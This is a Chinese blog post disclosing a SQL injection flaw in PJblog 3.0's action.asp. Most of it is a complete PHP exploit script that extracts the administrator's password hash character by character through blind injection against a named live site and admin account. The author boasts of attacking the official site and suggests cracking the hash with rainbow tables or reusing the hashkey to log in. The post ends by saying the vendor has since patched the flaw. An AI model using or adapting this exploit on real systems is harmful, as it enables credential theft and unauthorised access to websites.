鬼仔's Blog

作者：bink

影响版本：3.0
信息来源：零客网安www.0kee.com
Author：bink
漏洞文件：action.asp

很SB的洞。
第14行

strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")

这个贱B下午就跑人官方去捣乱了。

强奸出的密码是sha1，突死有彩虹表的人继续强奸吧
直接吊hashkey可以进前台操蛋
变量是双引号包着的，所以工具吊不出。
扔个exp。 好不好使看各位造化鸟。

<?php
/*
PJblog V3.0 0day exp
code by 小蟑螂&bink
www.0kee.com    www.t00ls.net
09.04.22
*/

$url="http://www.pjhome.net";    //注入地址
$var_name="puterjam";    //管理员
$var_key="check_right";

if ($_SESSION["LenI"]){
$LenI=$_SESSION["LenI"];
}else{
$LenI=1;
}
for($i=$LenI;$i<=40;$i++){
if($_SESSION["LenDo"]){
$StaAsc=$_SESSION["LenDo"];
}else{
$StaAsc=31;
}
echo "Scan password len:".$i." ;asc form ".$StaAsc." to 127";
for($j=$StaAsc;$j<=127;$j++){
$newurl=$url.'/action.asp?action=checkAlias&cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=\''.$var_name.'\'%29%3e'.$j.'%20and%20"1"="1';
$var_pagelen=file_get_contents($newurl);
$var_newpagelen=strpos($var_pagelen,$var_key);
if($var_newpagelen == true){
$_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr($j);
unset($_SESSION["LenDo"]);
$_SESSION["LenI"]=$i+1;
doReload();
break;
}
if($j == $StaAsc+10){
doReload();
break;
}
}
}
if ($_SESSION["LenI"]==40 && !($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; }

function doReload(){
?>
<script  language="javascript">
<!--
window.setTimeout('location.reload()',1000);
//-->
</script>
<?php
}
?>

此文发布时官方已经打了补丁